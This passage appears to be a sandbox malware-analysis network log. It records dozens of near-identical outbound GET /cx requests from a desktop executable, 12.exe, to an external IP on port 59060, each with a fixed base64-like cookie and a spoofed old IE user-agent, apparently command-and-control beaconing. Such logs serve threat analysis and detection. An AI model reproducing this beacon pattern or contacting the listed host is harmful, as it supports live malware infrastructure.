                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          30         | 192.168.2.4 | 49823       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:26.454684973 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          31         | 192.168.2.4 | 49829       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:29.422482967 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          32         | 192.168.2.4 | 49839       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:32.329576015 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          33         | 192.168.2.4 | 49846       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:35.282052994 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          34         | 192.168.2.4 | 49852       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:38.175260067 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          35         | 192.168.2.4 | 49858       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:41.077363968 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          36         | 192.168.2.4 | 49869       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:43.975519896 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          37         | 192.168.2.4 | 49875       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:46.910454988 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          38         | 192.168.2.4 | 49881       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:49.798528910 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          39         | 192.168.2.4 | 49887       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:52.706290007 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          40         | 192.168.2.4 | 49896       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:55.766638041 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          41         | 192.168.2.4 | 49904       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:29:58.656970024 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          42         | 192.168.2.4 | 49910       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:01.581043959 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          43         | 192.168.2.4 | 49916       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:04.487708092 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          44         | 192.168.2.4 | 49925       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:07.375737906 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          45         | 192.168.2.4 | 49933       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:10.273402929 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          46         | 192.168.2.4 | 49939       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:13.159877062 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          47         | 192.168.2.4 | 49945       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:16.272543907 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          48         | 192.168.2.4 | 49954       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:19.157583952 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          49         | 192.168.2.4 | 49962       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:22.064928055 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          50         | 192.168.2.4 | 49968       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:24.961429119 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          51         | 192.168.2.4 | 49973       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:27.845325947 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          52         | 192.168.2.4 | 49978       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:30.744345903 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          53         | 192.168.2.4 | 49987       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:33.642071962 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          54         | 192.168.2.4 | 49994       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:36.584374905 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          55         | 192.168.2.4 | 50000       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:39.533180952 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          56         | 192.168.2.4 | 50009       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:42.461770058 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          57         | 192.168.2.4 | 50016       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:45.363850117 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                          58         | 192.168.2.4 | 50022       | 152.42.226.16  | 59060            | 7324 | C:\Users\user\Desktop\12.exe
                          Timestamp                           | Bytes transferred | Direction | Data
                          Dec 26, 2024 19:30:48.253293991 CET | 380               | OUT       | GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 59 | Source IP: 192.168.2.4 | Source Port: 50029 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:30:51.145812988 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 60 | Source IP: 192.168.2.4 | Source Port: 50036 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:30:54.033323050 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 61 | Source IP: 192.168.2.4 | Source Port: 50045 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:30:56.974014044 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
                          Host: 152.42.226.16:59060
                          Connection: Keep-Alive
                          Cache-Control: no-cache


                          Session ID: 62 | Source IP: 192.168.2.4 | Source Port: 50050 | Destination IP: 152.42.226.16 | Destination Port: 59060 | PID: 7324 | Process: C:\Users\user\Desktop\12.exe
                          Timestamp: Dec 26, 2024 19:30:59.861352921 CET | Bytes transferred: 380 | Direction: OUT | Data: GET /cx HTTP/1.1
                          Accept: */*
                          Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=
